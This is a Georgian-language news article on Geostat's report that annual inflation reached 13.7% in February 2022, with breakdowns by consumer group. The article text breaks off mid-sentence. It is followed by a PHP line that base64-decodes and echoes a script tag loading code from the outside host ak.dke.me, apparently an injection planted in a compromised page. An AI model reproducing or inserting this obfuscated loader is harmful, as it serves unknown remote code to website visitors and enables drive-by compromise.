celsiusi
ავერსი საქკაბელი
საქსტატმა დღეს 2022 წლის თებერვლის ინფლაციის ამსახველი ანგარიში გამოაქვეყნა. დოკუმენტის მიხედვით, გასული თვის განმავლობაში ინფლაციამ 13.7% შეადგინა. ფასები გაზრდილია თითქმის ყველა სამომხმარებლო საქონელზე, დაწყებული სურსათიდ, დამთავრებული ტრანსპორტით. თუმცა, საქსტატის მიხედვით, ერთადერთი სამომხმარებლო ჯგუფი სადაც წინა წელთან შედარებით ფასების კლება დაფიქსირდა, ტანსაცმელი იყო, რომელშიც ფასებმა 1.6%-ით იკლო.
 
სურსათი და უალკოჰოლო სასმელები: ჯგუფში ფასები გაიზარდა 17.3%-ით, რაც წლიურ ინფლაციაზე 5.61 პროცენტული პუნქტით აისახა. ფასები მომატებულია შემდეგ ქვეჯგუფებზე: ბოსტნეული და ბაღჩეული (34.0 პროცენტი), მინერალური და წყაროს წყალი, უალკოჰოლო სასმელები და ნატურალური წვენები (23.4 პროცენტი), პური და პურპროდუქტები (20.8 პროცენტი), თევზეული (18.2 პროცენტი), ზეთი და ცხიმი (17.4 პროცენტი), შაქარი, ჯემი და სხვა ტკბილეული (15.6 პროცენტი), ხილი და ყურძენი (15.5 პროცენტი), რძე, ყველი და კვერცხი (14.4 პროცენტი), ხორცი და ხორცის პროდუქტები (11.0 პროცენტი), ყავა, ჩაი და კაკაო (10.4 პროცენტი);
 
საცხოვრებელი, წყალი, ელ.ენერგია, აირი: ჯგუფში დაფიქსირდა ფასების 45.8%-იანი მატება, რაც 3.72 პროცენტული პუნქტით აისახა წლიურ ინფლაციაზე. ფასები გაიზარდა ქვეჯგუფებზე: ელექტროენერგია, აირი და სათბობის სხვა სახეები (68.4 პროცენტი), წყალმომარაგება და საცხოვრებელთან დაკავშირებული სხვა მომსახურება (58.0 პროცენტი), საცხოვრებლის მიმდინარე მოვლა და შეკეთება (11.5 პროცენტი). ამასთან, ფასები შემცირდა საცხოვრებლის ფაქტიურ გადასახადზე (-2.9 პროცენტი);
 
ტრანსპორტის ჯგუფში ფასები გაიზარდა 14.5%-ით, რაც 1.88 პროცენტული პუნქტით აისახა მთლიანი ინდექსის ზრდაზე. ფასები, ძირითადად, მომატებულია პირადი სატრანსპორტო საშუალებების ექსპლუატაციაზე (19.6 პროცენტი) და სატრანსპორტო მომსახურებაზე (3.8 პროცენტი).
 
თებერვალში არსებული 13.7%-იანი ინფლაცია იანვარში არსებულ 13.9%-იან ინფლაციაზე 0.2 პროცენტული პუნქტით ნაკლებია. ეროვნული ბანკის პროგნოზით, ინფლაცია კლებას მარტიდან დაიწყებს და წლის ბოლოს სამიზნე მაჩვენებელს დაუახლოვდება, თუმცა ეს პროგნოზი რუსეთის მიერ უკ
861
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");